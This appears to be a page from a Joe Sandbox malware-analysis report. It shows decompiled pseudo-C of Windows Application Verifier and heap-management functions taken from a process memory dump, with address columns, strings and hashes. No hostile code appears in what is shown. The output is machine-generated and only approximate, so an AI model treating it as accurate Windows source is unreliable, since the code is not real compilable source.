					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x5945278; // 0x0
						L15:
						_t76 = E0586CF00(_t108, 0, _t131, 0x5821b90, 0,  &_v16, 1, _v0);
						E05881D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x5949238 = _t88 ^ _v16;
							 *0x5949230 = 1;
						}
						 *0x5949231 = 1;
						 *0x5949232 = 1;
						E058D964A(E05881D66(_t108, 0, 1));
						_t124 =  *0x5945240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x5945240;
							if(_t124 == 0x5945240) {
								break;
							}
							_v30 = _t97;
							_t128 = E05871934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x59469dc & 0x00000008;
						if(( *0x59469dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E058D8EB8(E0584B910());
						}
						E058D9818();
						E0585E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E0586D3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x5945d8c; // 0x5291e18
					_t10 = _t92 + 0x30; // 0x5290fe0
					E058DEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}


































                                                                                                                    0x058d8633
                                                                                                                    0x058d8633
                                                                                                                    0x058d8642
                                                                                                                    0x058d8644
                                                                                                                    0x058d8648
                                                                                                                    0x058d864d
                                                                                                                    0x058d8654
                                                                                                                    0x058d8658
                                                                                                                    0x058d865c
                                                                                                                    0x058d8661
                                                                                                                    0x058d8663
                                                                                                                    0x058d8861
                                                                                                                    0x058d8864
                                                                                                                    0x058d8866
                                                                                                                    0x058d8872
                                                                                                                    0x058d8877
                                                                                                                    0x058d887e
                                                                                                                    0x058d8886
                                                                                                                    0x058d888b
                                                                                                                    0x058d888f
                                                                                                                    0x058d8891
                                                                                                                    0x058d8893
                                                                                                                    0x058d8893
                                                                                                                    0x058d8880
                                                                                                                    0x058d8880
                                                                                                                    0x058d8880
                                                                                                                    0x058d889b
                                                                                                                    0x058d88a2
                                                                                                                    0x058d88ac
                                                                                                                    0x058d88ac
                                                                                                                    0x00000000
                                                                                                                    0x058d88a4
                                                                                                                    0x058d88a4
                                                                                                                    0x058d88a6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d88a8
                                                                                                                    0x058d88b1
                                                                                                                    0x058d88b1
                                                                                                                    0x058d88b6
                                                                                                                    0x058d88bb
                                                                                                                    0x058d88c2
                                                                                                                    0x058d88c4
                                                                                                                    0x058d88ef
                                                                                                                    0x058d88ef
                                                                                                                    0x058d88f4
                                                                                                                    0x058d88f6
                                                                                                                    0x058d88f6
                                                                                                                    0x058d88fc
                                                                                                                    0x058d88fc
                                                                                                                    0x058d88fe
                                                                                                                    0x058d8900
                                                                                                                    0x058d8902
                                                                                                                    0x058d8915
                                                                                                                    0x058d8915
                                                                                                                    0x058d892b
                                                                                                                    0x058d8943
                                                                                                                    0x058d8943
                                                                                                                    0x058d8948
                                                                                                                    0x058d895f
                                                                                                                    0x058d8961
                                                                                                                    0x058d8963
                                                                                                                    0x058d8965
                                                                                                                    0x058d8970
                                                                                                                    0x058d8972
                                                                                                                    0x058d8974
                                                                                                                    0x058d8978
                                                                                                                    0x058d8982
                                                                                                                    0x058d8987
                                                                                                                    0x058d8987
                                                                                                                    0x058d8974
                                                                                                                    0x058d898c
                                                                                                                    0x058d8994
                                                                                                                    0x058d8994
                                                                                                                    0x058d88d6
                                                                                                                    0x058d88db
                                                                                                                    0x058d88df
                                                                                                                    0x058d88e1
                                                                                                                    0x058d88ea
                                                                                                                    0x00000000
                                                                                                                    0x058d88ea
                                                                                                                    0x058d88e3
                                                                                                                    0x00000000
                                                                                                                    0x058d88e3
                                                                                                                    0x058d88a2
                                                                                                                    0x058d8868
                                                                                                                    0x00000000
                                                                                                                    0x058d8868
                                                                                                                    0x058d866c
                                                                                                                    0x058d885a
                                                                                                                    0x058d885a
                                                                                                                    0x00000000
                                                                                                                    0x058d885a
                                                                                                                    0x058d867e
                                                                                                                    0x058d8684
                                                                                                                    0x058d868f
                                                                                                                    0x058d8693
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d86a0
                                                                                                                    0x058d883f
                                                                                                                    0x058d8850
                                                                                                                    0x058d8852
                                                                                                                    0x058d8854
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d8854
                                                                                                                    0x058d86a6
                                                                                                                    0x058d86b2
                                                                                                                    0x058d86b5
                                                                                                                    0x058d86ba
                                                                                                                    0x058d86c5
                                                                                                                    0x058d86d4
                                                                                                                    0x058d8719
                                                                                                                    0x058d872e
                                                                                                                    0x058d872e
                                                                                                                    0x058d8730
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d8723
                                                                                                                    0x058d8728
                                                                                                                    0x058d872a
                                                                                                                    0x058d875e
                                                                                                                    0x00000000
                                                                                                                    0x058d872c
                                                                                                                    0x058d872c
                                                                                                                    0x00000000
                                                                                                                    0x058d872c
                                                                                                                    0x058d872a
                                                                                                                    0x058d8732
                                                                                                                    0x058d8740
                                                                                                                    0x058d874a
                                                                                                                    0x058d874c
                                                                                                                    0x058d874e
                                                                                                                    0x058d8768
                                                                                                                    0x058d876e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d8774
                                                                                                                    0x058d877a
                                                                                                                    0x058d878e
                                                                                                                    0x058d8797
                                                                                                                    0x058d879c
                                                                                                                    0x058d879e
                                                                                                                    0x058d87a0
                                                                                                                    0x058d87ab
                                                                                                                    0x058d87ab
                                                                                                                    0x058d87ae
                                                                                                                    0x058d87b0
                                                                                                                    0x058d87b5
                                                                                                                    0x058d87b5
                                                                                                                    0x058d87bc
                                                                                                                    0x058d87c2
                                                                                                                    0x058d87cd
                                                                                                                    0x058d87d2
                                                                                                                    0x058d87d8
                                                                                                                    0x058d87d8
                                                                                                                    0x058d87da
                                                                                                                    0x058d87da
                                                                                                                    0x058d87e0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d87ec
                                                                                                                    0x058d87f8
                                                                                                                    0x058d87fa
                                                                                                                    0x058d87fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d8802
                                                                                                                    0x058d8802
                                                                                                                    0x058d8806
                                                                                                                    0x058d880d
                                                                                                                    0x058d880f
                                                                                                                    0x058d881a
                                                                                                                    0x058d881a
                                                                                                                    0x058d881f
                                                                                                                    0x058d8834
                                                                                                                    0x00000000
                                                                                                                    0x058d8834
                                                                                                                    0x058d8750
                                                                                                                    0x058d8754
                                                                                                                    0x058d8757
                                                                                                                    0x00000000
                                                                                                                    0x058d86d6
                                                                                                                    0x058d86dc
                                                                                                                    0x058d86df
                                                                                                                    0x058d86e4
                                                                                                                    0x058d86ef
                                                                                                                    0x058d86fd
                                                                                                                    0x058d8711
                                                                                                                    0x00000000
                                                                                                                    0x058d8711

                                                                                                                    Strings
                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 058D86E7
                                                                                                                    • VerifierDlls, xrefs: 058D893D
                                                                                                                    • VerifierFlags, xrefs: 058D88D0
                                                                                                                    • VerifierDebug, xrefs: 058D8925
                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 058D880F
                                                                                                                    • HandleTraces, xrefs: 058D890F
                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 058D86BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                    • API String ID: 0-3223716464
                                                                                                                    • Opcode ID: 512e0a694b09d36df944c5f7983bbf0df79d674c223ef9ee195b683223d418d0
                                                                                                                    • Instruction ID: 290be790c8f8ac093f995f9a7fe63fd3461f50d429bebe70027d971dfbddcc49
                                                                                                                    • Opcode Fuzzy Hash: 512e0a694b09d36df944c5f7983bbf0df79d674c223ef9ee195b683223d418d0
                                                                                                                    • Instruction Fuzzy Hash: DB91E371A08715ABD721DF688886F2AFBE5EB40714F060459FD81EB250DB70AC05CFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 65%
                                                                                                                    			E0584F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x5946d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = E05860B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E0584F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E05849E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E0584BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x5946960 - 1;
						if( *0x5946960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E0584B910();
								} else {
									E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0584B910();
								__eflags =  *0x5945da8;
								if( *0x5945da8 == 0) {
									__eflags = 0;
									E0590FC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x5946960 - 1;
							if( *0x5946960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E0584B910();
							} else {
								E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E0584B910();
							__eflags =  *0x5945da8;
							if( *0x5945da8 == 0) {
								__eflags = 0;
								E0590FC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E0584FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								E0586096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = E05863C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E0590F13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E05849E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E0584B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x5946960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E0584B910();
											} else {
												E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E0584B910();
											__eflags =  *0x5945da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E0590FC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											E05915FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									E05860B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = E05863C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = E05863C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E0590F058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = E05863C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = E05863C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E0590F058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x5946960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x5946960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E0584B910();
											} else {
												E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E0584B910();
											__eflags =  *0x5945da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												E0590FC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E05915FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									E05860B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							E0586096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							E05860B10(_t547, _v60, _v24);
							_t274 = E05863C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = E05863C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E0590F058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = E05863C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = E05863C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E0584FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = E05863C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E0590F13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E05861EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E05860B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E0584F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                                    0x0584f113
                                                                                                                    0x0584f120
                                                                                                                    0x0584f123
                                                                                                                    0x0584f127
                                                                                                                    0x0584f137
                                                                                                                    0x0584f13b
                                                                                                                    0x058adc64
                                                                                                                    0x058adc67
                                                                                                                    0x0584f1d5
                                                                                                                    0x0584f1d5
                                                                                                                    0x0584f1c7
                                                                                                                    0x0584f1cd
                                                                                                                    0x0584f1cd
                                                                                                                    0x0584f144
                                                                                                                    0x058adc75
                                                                                                                    0x058adc79
                                                                                                                    0x058adc7b
                                                                                                                    0x058adc8d
                                                                                                                    0x058adc92
                                                                                                                    0x058adc94
                                                                                                                    0x058adc9a
                                                                                                                    0x058adc9a
                                                                                                                    0x058adc9a
                                                                                                                    0x058adc9a
                                                                                                                    0x058adc94
                                                                                                                    0x058adca0
                                                                                                                    0x058adca3
                                                                                                                    0x058adca5
                                                                                                                    0x0584f202
                                                                                                                    0x0584f202
                                                                                                                    0x0584f205
                                                                                                                    0x0584f207
                                                                                                                    0x058adcae
                                                                                                                    0x0584f20d
                                                                                                                    0x0584f21b
                                                                                                                    0x0584f21b
                                                                                                                    0x0584f21b
                                                                                                                    0x0584f228
                                                                                                                    0x0584f22a
                                                                                                                    0x0584f22e
                                                                                                                    0x0584f231
                                                                                                                    0x0584f23f
                                                                                                                    0x0584f243
                                                                                                                    0x0584f248
                                                                                                                    0x0584f24f
                                                                                                                    0x0584f256
                                                                                                                    0x0584f259
